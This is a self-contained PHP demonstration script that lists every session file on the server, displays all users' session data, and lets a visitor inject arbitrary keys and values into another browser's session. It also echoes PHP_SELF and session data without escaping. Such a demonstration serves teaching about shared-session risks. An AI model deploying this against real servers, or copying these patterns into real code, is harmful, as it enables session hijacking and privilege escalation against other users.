Manipulating Other Users' PHP Sessions

<?php

    // The "unserializesession" function is from
    // http://www.php.net/manual/en/function.session-decode.php#101687

    function unserializesession( $data )
    {
        if(  strlen( $data) == 0)
        {
            return array();
        }

        // match all the session keys and offsets
        preg_match_all('/(^|;|\})([a-zA-Z0-9_]+)\|/i', $data, $matchesarray, PREG_OFFSET_CAPTURE);

        $returnArray = array();

        $lastOffset = null;
        $currentKey = '';
        foreach ( $matchesarray[2] as $value )
        {
            $offset = $value[1];
            if(!is_null( $lastOffset))
            {
                $valueText = substr($data, $lastOffset, $offset - $lastOffset );
                $returnArray[$currentKey] = unserialize($valueText);
            }
            $currentKey = $value[0];

            $lastOffset = $offset + strlen( $currentKey )+1;
        }

        $valueText = substr($data, $lastOffset );
        $returnArray[$currentKey] = unserialize($valueText);

        return $returnArray;
    }

    // The "session_raw_encode" function is from
    // http://www.php.net/manual/en/function.session-encode.php#76425

    function session_raw_encode( $array, $safe = true ) {

        // the session is passed as refernece, even if you dont want it to
        if( $safe )
            $array = unserialize(serialize( $array )) ;


        $raw = '' ;
        $line = 0 ;
        $keys = array_keys( $array ) ;
        foreach( $keys as $key ) {
            $value = $array[ $key ] ;
            $line ++ ;

            $raw .= $key .'|' ;

            if( is_array( $value ) && isset( $value['huge_recursion_blocker_we_hope'] )) {
                $raw .= 'R:'. $value['huge_recursion_blocker_we_hope'] . ';' ;
            } else {
                $raw .= serialize( $value ) ;
            }
            $array[$key] = Array( 'huge_recursion_blocker_we_hope' => $line ) ;
        }

        return $raw ;

    }

    function get_sessions()
    {
        $sessions = array();

        $iterator = new DirectoryIterator(session_save_path());

        foreach ($iterator as $item)
        {
            if ($item->isFile())
            {
                if (substr($item->getFilename(), 0, 5) == 'sess_')
                {
                    $session_id = substr($item->getFilename(), 5);

                    $sessions[$session_id] = unserializesession(file_get_contents($item->getPathname()));
                }
            }
        }

        return $sessions;
    }

    session_start();

    if (
        isset($_POST['session_id']) && is_string($_POST['session_id']) &&
        isset($_POST['key']) && is_string($_POST['key']) &&
        isset($_POST['value']) && is_string($_POST['value'])
    )
    {
        $sessions = get_sessions();

        if (array_key_exists($_POST['session_id'], $sessions))
        {
            $sessions[$_POST['session_id']][$_POST['key']] = $_POST['value'];

            file_put_contents(session_save_path() . DIRECTORY_SEPARATOR . "sess_{$_POST['session_id']}", session_raw_encode($sessions[$_POST['session_id']]));
        }
    }
    elseif (isset($_POST['destroy_this_session']))
    {
        session_destroy();
        session_start();
    }

    $_SESSION['user_agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    session_write_close();
    $sessions = get_sessions();

?>
<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>Manipulating Other Users' PHP Sessions</title>
    </head>
    <body>
        <h1>Manipulating Other Users' PHP Sessions</h1>

        <p>Instructions: open this PHP script in at least two different browsers and mess around with each other's sessions.</p>

        <p><code>session_save_path() = <?php echo session_save_path(); ?></code></p>

        <p>This browser's session ID: <code><?php echo session_id(); ?></code></p>

        <h2>Current Session Data</h2>

        <pre><?php print_r($sessions); ?></pre>

        <hr>

<?php

    if (count($sessions) == 1)
    {
        echo '<p>You must visit this page with another browser in order to continue on.</p>';
    }
    else
    {

?>
        <p>Choose a session ID and enter the key and value you'd like to inject into their session.</p>

        <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
            <select name="session_id">
<?php

        foreach ($sessions as $session_id => $session_data)
        {
            if ($session_id == session_id())
            {
                continue;
            }

            echo "<option value=\"$session_id\">$session_id</option>";
        }

?>
            </select>
            <label for="key">Key:</label> <input type="text" name="key" id="key">
            <label for="value">Value:</label> <input type="text" name="value" id="value">
            <input type="submit" value="Submit">
        </form>
<?php

    }

?>
        <hr>

        <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
            <input type="hidden" name="destroy_this_session" value="true">
            <input type="submit" value="Destroy This Browser's Session">
        </form>
    </body>
</html>